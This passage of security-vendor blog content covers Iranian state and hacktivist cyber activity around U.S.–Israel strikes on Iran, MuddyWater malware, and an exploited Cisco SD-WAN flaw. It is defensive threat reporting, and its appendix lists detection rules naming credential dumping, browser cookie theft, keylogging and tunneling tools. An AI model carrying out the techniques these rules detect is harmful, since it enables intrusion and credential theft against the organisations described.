Coruna demonstrates how advanced spyware-grade exploit frameworks can spread from surveillance vendors to nation-state actors and eventually cybercriminal groups, highlighting the growing commercialization and reuse of sophisticated zero-day capabilities in the mobile threat landscape.

The Ugly | Hacktivists Launch Retaliatory Cyberattacks After U.S.–Israel Strikes on Iran

Following the U.S.-Israel military operations against Iran, cybersecurity researchers are flagging a spike in retaliatory hacktivist activity codenamed as ‘Epic Fury’ and ‘Roaring Lion’. The surge has primarily taken the form of distributed denial-of-service (DDoS) attacks, data leaks, and online disruption targeting both government and critical infrastructure organizations.

A new report describes how three main hacktivist groups, Keymous+, DieNet, and NoName057(16), have been responsible for nearly 70% of observed attack activity between February 28 and March 2, 2026. The first recorded attack during this period was launched by Hider Nex (aka Tunisian Maskers Cyber Force), a pro-Palestinian hacktivist collective that combines DDoS attacks with data breaches to support geopolitical messaging.

Hider Nex claiming the first DDoS attack on Telegram (source: Radware)

In total, researchers recorded 149 DDoS attacks targeting 110 organizations across 16 countries, carried out by 12 hacktivist groups. The majority of attacks focused on the Middle East, with 107 incidents targeting regional organizations. Government entities were the most affected sector, accounting for nearly 48% of the victims, followed by organizations in financial services and telecommunications.

Several other cyber threats have emerged alongside the hacktivist campaigns. Pro-Russian groups are claiming breaches of Israeli military networks, while threat actors have an active SMS phishing campaign distributing malware disguised as an Israeli civil defense alert app. Iranian state-linked actors associated with the Islamic Revolutionary Guard Corps (IRGC) have reportedly targeted regional energy and digital infrastructure, striking major oil refineries and data centers in the U.A.E.

Iranian-aligned cyber actors have historically blended espionage, disruption, and influence operations during geopolitical crises, suggesting the potential for broader targeting of government, infrastructure, financial, and technology sectors applicable on a global scale, too.

SentinelOne Intelligence Brief: Iranian Cyber Activity Outlook

To Our Partners and Customers

The following intelligence brief was sent to all SentinelOne partners and customers today:

Executive Summary

Recent U.S. and Israeli strikes against Iranian targets, followed by Iranian attacks on multiple regional locations, present a highly dynamic geopolitical situation with credible cyber threat implications. Iran has historically incorporated cyber operations into periods of regional escalation.

Given the rapid escalation of geopolitical tensions, we assess that Iranian state-aligned cyber activity is likely to intensify in the near-term based on a long track record of leveraging cyber operations for asymmetric retaliation, coercive signaling, and strategic messaging. Prior campaigns, including destructive wiper malware, infrastructure disruption, and influence operations masquerading as ‘hacktivism’, demonstrate both capability and intent to operate in the cyber domain alongside kinetic action.

At the time of publication, SentinelOne has not attributed significant malicious cyber activity directly to these recent events. We have no indications that SentinelOne or our customers are being specifically targeted in connection with these developments.

This report outlines Iran’s historical cyber posture, relevant tactics and tradecraft, and our forward-looking assessment of potential cyber responses in the days and weeks following the airstrikes.

We assess with high confidence that organizations in Israel, the United States, and allied nations are likely to face direct or indirect targeting – particularly within government, critical infrastructure, defense, financial services, academic, and media sectors.

We recommend that all clients, especially those operating in, or supporting, U.S. and Israeli infrastructure, review their security posture and preparedness accordingly.

This assessment is current as of February 28, 2026 and reflects a rapidly evolving threat environment.

Iran’s Cyber Operations to Date

Iran presents a mature, well-resourced cyberthreat based on more than fifteen years of experience across a wide range of malicious cyber events.

Iran uses a diverse set of cyber tools to further state objectives, particularly preservation of the Iranian regime, including:

  • Espionage and credential theft via APT34, APT39, APT42, and MuddyWater, targeting a wide range of military, civilian, telecommunications, and academic institutions, particularly against regional targets (Israel, Middle East) and the United States
  • Disruptive and destructive campaigns, including the use of wiper malware
  • Targeted spearphishing and social engineering campaigns, supporting strategic intelligence collection across multiple industries
  • Fake hacktivist personas for plausible deniability and psychological impact (e.g., DarkBit, Cyber Av3ngers)
  • Coordinated disinformation and influence ops across Telegram, X, and compromised news outlets
  • Internet blackouts within Iran to control public opinion and narrative, while similarly countering the effect of foreign influence operations
  • Proxy ransomware and criminal fronts blurring lines between state and financially motivated actors

Iranian cyber actors previously aligned their operations with kinetic campaigns, often acting as a force multiplier for regional allies like Hamas or as a standalone tool of retaliation. The TTPs employed by Iranian hacktivists increasingly mirror those used by state-sponsored APTs, raising critical questions about capability sharing and formal command-and-control relationships within this environment.

Expected Iranian Cyber Response to Current Events

1 – Precision Espionage Operations

Expect escalated targeting of Israeli defense, government, and intelligence networks using spearphishing, credential harvesting, and deployment of custom malware. Historically, groups such as APT34 (OilRig) and APT42 (TA453) leveraged legitimate access to move laterally and exfiltrate strategic intelligence. Additionally, U.S. military and government organizations will likely be targeted in similar campaigns.

Anticipated Targets:

  • U.S. military and government organizations
  • Israeli defense entities and affiliated research organizations
  • U.S. and Israeli diplomatic infrastructure
  • Defense contractors and supply chain partners
  • Strategic allies and locations in theater

2 – Disruptive & Destructive Tactics

Iran has a well-documented history of using destructive malware and DDoS attacks to disrupt the critical infrastructure of its adversaries. We assess a high likelihood of similar tactics being deployed against U.S. and Israeli sectors, particularly utilities and public-facing systems.

Key techniques include:

  • Deployment of wipers via fake hacktivist personas or directly-attributed APT clusters
  • Exploitation of unpatched or poorly secured public-facing web services for defacement and initial access
  • Use of scheduled tasks and LOLBins to execute custom wiper malware with stealth and persistence

Anticipated Targets:

  • Transportation, Communication, Energy and Water utilities in U.S. and Israel
  • Telecom, alerting systems, and national broadcast infrastructure
  • Financial platforms and digital banking services

3 – Coordinated Influence & Disinformation Campaigns

Iranian-aligned actors are likely to amplify disinformation campaigns to shape public perception, particularly around civilian impact, military failure, and geopolitical instability. These efforts often run concurrently with real-world escalations and aim to degrade public trust in institutions.

Anticipated Themes:

  • Allegations of Israeli war crimes
  • U.S. and Israeli military losses
  • Fabricated claims of successful Iranian cyber retaliation
  • Disinformation on U.S.–Israel political division
  • Leaks of manipulated or stolen documents misattributed to Israeli insiders
  • Lack of support from the U.S. populace for ongoing strikes against Iran

4 – Probing Attacks on U.S. & Israeli Infrastructure

Iran has demonstrated readiness to expand attacks to Western infrastructure during periods of high tension. Recent examples include the exploitation of Unitronics PLCs at U.S. water treatment plants (late 2023), highlighting a shift toward ICS/OT targets. Such actions serve retaliatory and signaling purposes and are often designed to be low-impact yet high-visibility to maximize psychological effect.

Anticipated Targets:

  • U.S. defense industrial base, especially contractors supporting military action
  • Israeli military and key government organizations
  • Critical infrastructure (water, energy, transportation) in the U.S. and Israel
  • Regional partners (e.g., Jordan, UAE, Egypt, Saudi Arabia) aligned with U.S. and Israeli interests
  • Media and academic institutions reporting on the conflict

SentinelOne Detection & Monitoring Posture

SentinelOne research and detection teams have closely followed Iranian cyber actors for many years. We provide multiple layers of protection and are closely monitoring emerging threat intelligence to maximize coverage.

We extensively cover techniques known to be used by Iranian threat groups including:

  • PowerShell and script abuse
  • Proxy tools
  • Credential theft
  • Keylogger components
  • Wipers
  • Browser credential theft
  • DLL sideloading
  • Tunneling tools (ngrok/Cloudflared)
  • Scheduled task persistence
  • Remote access tool abuse
  • Active Directory reconnaissance
  • Destructive boot tampering

These protections are not Iran-specific but known to be effective in detecting their operations.

We are monitoring the situation closely and can ship new detections quickly through Platform Rules updates or Live Security Updates.

For maximum protection, we recommend:

  • Turning on Live Updates
  • Ensuring you’re opted-in to Emerging Threat Platform Rules
  • Activating Platform Detection Library rules listed in Appendix A

Recommendations

  1. Increase Vigilance Against Phishing and Credential Abuse
  • Prioritize MFA enforcement and internal phishing detection
  • Monitor for abuse of VPN, email, and collaboration platforms
  • Monitor for suspicious activity involving legitimate user accounts and applications
  1. Harden Critical Infrastructure and OT Environments
  • Patch and segment exposed ICS components, especially common HMI/PLC vendors
  • Scan all Internet-facing infrastructure, and patch any vulnerable Internet-facing services
  • Consider removing or restricting network access to any non-critical Internet-facing services, especially if they are not protected by MFA
  • Review DDoS mitigation playbooks and response procedures
  1. Monitor for Influence Operations and Fake Leaks
  • Establish rapid communication response protocols for disinformation relevant to your organization
  • Be prepared for threat actors using “hacktivist” branding and Telegram/Telegram-style platforms for communication
  • Consider there are likely masquerade efforts and this requires a detailed assessment to determine true origin
  1. Review and Test Incident Response Plans
  • Ensure IR and SOC teams maintain heightened alert status
  • Simulate data-wipe and ransomware scenarios
  • Simulate corporate social media hijacking scenarios and prepare for account pausing/access resets
  1. Establish Clear Points of Contact
  • Ensure internal organization has direct POCs for support for security incidents
  • Communicate posture expectations and escalation paths internally
  1. Monitor for activity associated with Iranian state-aligned threat actors

SentinelOne is proactively hunting for IOCs and TTPs associated with these groups. These threat hunts are being performed for all Wayfinder Threat Hunting customers. Any related hunt findings will be visible in the Wayfinder Threat Hunting dashboard.

Closing Note

This report is intended to support informed decision-making and proactive defensive measures amid a dynamic and escalating geopolitical conflict.

The cyber threat landscape associated with Iranian state-aligned actors is adaptive, and we assess that both targeting priorities and tactics may shift rapidly in response to real world developments, political statements, or perceived provocations.

We advise clients to treat this as a time-sensitive assessment and to revisit posture, incident response, and monitoring processes regularly.

For immediate questions or escalations, please contact your Client Success Lead or reach our Support teams directly at: https://www.sentinelone.com/global-services/get-support-now/

Appendix

Customers should consider activating Platform Detection Library rules to improve coverage. The following rules are known to be effective against Iranian cyber operations:

MuddyWater

  • Possible MuddyWater DLL Drop Consistent with Audio Driver Sideloading

Credential Dumping

  • Suspicious Task Creation for Credential Harvesting
  • Python-Based Network Exploitation Tool
  • Potential LSASS Dumping Tools
  • Credential Dumping via Shadow Copy
  • Interactive NTDS Harvesting via VSS
  • Cached Domain Credential Dumping

Tunneling & Remote Access

  • Ngrok Domain Contacted
  • Cloudflared Persistent Tunnel Establishment Detected
  • Anomalous Process Initiating Cloudflare Tunnel Traffic

Collection & Exfiltration

  • Keylogging Script via PowerShell
  • Chromium Browser Info Stealer via Remote Debugging
  • Browser Credential and Cookie Data Access Attempt

PowerShell/Script Abuse

  • PowerShell Script Execution via Time Based Integer IPv4
  • Suspicious Usage of .NET Reflection via PowerShell
  • Encoded Powershell Launching Command Line Download

Defense Evasion, Impact, Discovery

  • Potential DLL Sideloading in PerfLogs Directory
  • Disk Data Wipe Attempt via Dd Utility
  • Boot Configuration Tampering via BCDEdit
  • BloodHound Active Directory Reconnaissance File Creation

The Good, the Bad and the Ugly in Cybersecurity – Week 9

The Good | Authorities Arrest Hacktivist & Convict L3Harris Insider for Selling Secrets to Russia

Spanish authorities have arrested four suspected members of “Anonymous Fénix”, a hacktivist group accused of launching distributed denial-of-service (DDoS) attacks against government ministries, political parties, and public institutions in Spain and parts of South America.

According to the Spanish Civil Guard, the group intensified its operations after the deadly Valencia floods in October 2024, blaming officials for the disaster. The suspects allegedly used X and Telegram to spread anti-government propaganda and recruit volunteers. Courts have since shut down the group’s social media accounts and messaging channels as part of a broader crackdown on cybercrime networks.

In the U.S., a former executive at defense contractor L3Harris Technologies has been sentenced to over seven years in prison for stealing classified zero-day exploits and selling them to a Russian cyber-weapons broker. Peter Williams, who led the firm’s Trenchant cybersecurity unit, admitted taking at least eight sensitive exploit components between 2022 and 2025, using an external drive and encrypted transfers. He sold the tools, developed exclusively for U.S. and allied intelligence agencies, for millions of dollars in cryptocurrency.

U.S. prosecutors said the theft caused tens of millions in losses and posed a severe national security risk. The broker, Operation Zero, allegedly resells exploits to Russian government and private clients. The Department of the Treasury simultaneously imposed sanctions on the company, its owner Sergey Sergeyevich Zelenyuk, and affiliated entities under a law targeting intellectual property theft by foreign adversaries.

Williams pleaded guilty in October 2025 and was ordered to forfeit cash, cryptocurrency, property, and luxury assets. Insider threats endangering national defense capabilities continue to rise and officials warn that trafficking in offensive cyber tools has become a lucrative global black market.

The Bad | ‘MuddyWater’ Actors Launch Operation Across the MENA Region with New Malware

MuddyWater (aka TEMP.Zagros, TA450, G0069), an Iranian state-linked threat actor, has initiated a new cyber campaign dubbed “Operation Olalampo”, which targets organizations and individuals across the Middle East and North Africa (MENA) amid ongoing regional tensions. First observed in January, new research observes the operation introducing novel malware variants while maintaining tactics consistent with the group’s past intrusions.

The campaign relies heavily on phishing emails carrying malicious Microsoft Office attachments that trigger macro-based infections. Victims are tricked into enabling macros, which deploy novel downloaders GhostFetch and HTTP_VIP. These tools profile compromised systems, evade legacy defenses, and deliver secondary payloads including the novel GhostBackDoor malware, an implant capable of remote command execution, file manipulation, and persistent access. In some cases, attackers deploy legitimate remote administration software to blend malicious activity with normal operations.

Malicious Microsoft Excel file before macros are enabled (Source: Group-IB)

A notable addition is CHAR, another novel Rust-based backdoor controlled through a Telegram bot for command-and-control (C2), enabling attackers to execute commands, exfiltrate data, and launch additional malware. Analysis indicates possible AI-assisted development, reflecting threat actors increasing experimentation with generative tools to accelerate malware creation. Researchers also noted infrastructure reuse from late 2025, suggesting sustained operations rather than isolated attacks.

Operation Olalampo points to MuddyWater’s focus on post-exploitation control, including reconnaissance, credential harvesting, and lateral movement. The group has also exploited vulnerabilities in public-facing servers to gain initial access. Security analysts warn that the campaign is a sign of broader plans to target network edge systems and critical sectors to establish long-term footholds, reinforcing concerns about nation-state-backed cyber operations expanding in scope and sophistication across the MENA region.

Defenders are urged to prioritize phishing resistance and monitor for unusual outbound communications to messaging platforms often used as C2 channels.

The Ugly | Attackers Exploit Critical Cisco SD-WAN Flaw to Target National Infrastructure

Cisco has disclosed an active zero-day exploitation of a critical authentication bypass in its Catalyst SD-WAN platform, a maximum-severity flaw that lets remote attackers compromise controllers and insert malicious peers into targeted networks. The flaw, tracked as CVE-2026-20127, affects both on-premises and cloud deployments of SD-WAN Controller, Manager, and Cloud products.

The vulnerability stems from a broken peering authentication mechanism that can be abused with crafted requests. Successful exploitation grants attackers high-privilege internal access, enabling manipulation of network configurations via NETCONF. By adding malicious peers that appear legitimate, adversaries can route traffic, advertise attacker-controlled networks, and pivot deeper into affected environments.

Cisco Talos attributes the campaign, tracked as UAT-8616, to a sophisticated threat actor active since at least 2023. Investigators believe attackers escalated privileges by downgrading to an older version of the software, exploiting an older root-level flaw (CVE-2022-20775), then restoring the original version to evade detection while retaining control. Talos also links the activity to a broader pattern of targeting network edge devices to gain footholds in high-value organizations, including critical national infrastructure (CNI) operators, suggesting possible nation-state backing.

Government agencies warn the threat is global and ongoing. So far, CISA has issued an emergency directive ordering federal agencies to inventory devices, collect forensic evidence, and patch immediately, while the UK’s National Cyber Security Centre urges organizations to report signs of compromise and follow hardening guidance to minimize risk.

Indicators or compromise include suspicious authentication logs, unauthorized SSH keys, rogue accounts, log tampering, and unexplained software downgrades. Authorities also stress that SD-WAN management interfaces should never be internet-exposed and recommend isolating control systems, forwarding logs externally, and applying updates.

❌